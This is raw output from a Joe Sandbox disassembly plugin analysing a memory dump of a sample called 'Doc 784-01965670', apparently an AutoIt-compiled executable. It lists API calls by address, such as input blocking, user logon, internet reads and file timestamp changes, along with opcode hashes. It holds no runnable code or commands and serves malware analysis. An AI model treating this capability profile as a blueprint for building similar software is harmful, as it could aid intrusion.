Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• IsWindowVisible.USER32 ref: 00477314
• IsWindowEnabled.USER32 ref: 00477324
• GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
• IsIconic.USER32 ref: 0047733F
• IsZoomed.USER32 ref: 0047734D
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
• SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: ACCEPT$^$h
• API String ID: 909875538-4263704089
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU
• API String ID: 0-2165971703
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
APIs
• GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
• FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
• FindClose.KERNEL32(00000000), ref: 00436B13
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Strings
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Strings
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
APIs
• InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
• InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
• FindClose.KERNEL32(00000000), ref: 0045DDDD
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
Strings
Similarity
• API ID:
• String ID: 0vH$HH
• API String ID: 0-728391547
                                                                                                                                    • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                    • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                                    • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                    • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102423945-0
                                                                                                                                    • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                    • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                                    • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                    • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                                    APIs
                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Proc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2346855178-0
                                                                                                                                    • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                    • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                                    • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                    • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                                    APIs
                                                                                                                                    • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BlockInput
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                    • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                    • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                                    • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                    • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                                    APIs
                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LogonUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                    • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                    • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                                    • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                    • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NameUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                    • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                    • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                                    • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                    • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                    • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                                    • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                    • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
• Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
• Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
• Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
• Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
• Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
• Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
• Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
Memory Dump Source
• Source File: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21778448ec94ec63dbe1f941a4b01615b2757a24e87cf7a9a216f1c035904463
• Instruction ID: b6387dd0e7c7fd58fd59291b8269ee9041754a2b9a52afa5a35da147da65d0c1
• Opcode Fuzzy Hash: 21778448ec94ec63dbe1f941a4b01615b2757a24e87cf7a9a216f1c035904463
• Instruction Fuzzy Hash: 4F41466544E7D04FCB138BB888B5AA27FB0AE07214B5F44DBC5C5CF4B3D658994AC722
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
• Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
• Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
• Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
APIs
• DeleteObject.GDI32(?), ref: 004593D7
• DeleteObject.GDI32(?), ref: 004593F1
• DestroyWindow.USER32(?), ref: 00459407
• GetDesktopWindow.USER32 ref: 0045942A
• GetWindowRect.USER32(00000000), ref: 00459431
• SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
• GetClientRect.USER32(00000000,?), ref: 004595C8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
• CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
• GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
• GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
• GlobalLock.KERNEL32(00000000), ref: 00459668
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
• GlobalUnlock.KERNEL32(00000000), ref: 0045967F
• CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
• GlobalFree.KERNEL32(00000000), ref: 004596C0
• CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
• SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
• ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
• CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
• GetStockObject.GDI32(00000011), ref: 004597B7
• SelectObject.GDI32(00000000,00000000), ref: 004597BF
• GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
• DeleteDC.GDI32(00000000), ref: 004597E1
• _wcslen.LIBCMT ref: 00459800
• _wcscpy.LIBCMT ref: 0045981F
• CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
• GetDC.USER32(?), ref: 004598DE
• SelectObject.GDI32(00000000,?), ref: 004598EE
• SelectObject.GDI32(00000000,?), ref: 00459919
• ReleaseDC.USER32(?,00000000), ref: 00459925
• MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 4040870279-2373415609
• Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
• Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
• Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
• Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
APIs
• GetSysColor.USER32(00000012), ref: 00441E64
• SetTextColor.GDI32(?,?), ref: 00441E6C
• GetSysColorBrush.USER32(0000000F), ref: 00441E83
• GetSysColor.USER32(0000000F), ref: 00441E8F
• SetBkColor.GDI32(?,?), ref: 00441EAA
• SelectObject.GDI32(?,?), ref: 00441EBA
• InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
• GetSysColor.USER32(00000010), ref: 00441EF8
• CreateSolidBrush.GDI32(00000000), ref: 00441EFF
• FrameRect.USER32(?,?,00000000), ref: 00441F10
• DeleteObject.GDI32(?), ref: 00441F1B
• InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
• FillRect.USER32(?,?,?), ref: 00441FB6
  • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
  • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
  • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
  • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
  • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
  • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
  • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
  • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
  • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
  • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
  • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
  • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
  • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
• String ID:
• API String ID: 69173610-0
                                                                                                                                    • Opcode ID: 63a2be33accb074b4178bb2d7a96f271ea41f5903b36f57aa3a0bb7ff7b8698e
                                                                                                                                    • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                                                                                    • Opcode Fuzzy Hash: 63a2be33accb074b4178bb2d7a96f271ea41f5903b36f57aa3a0bb7ff7b8698e
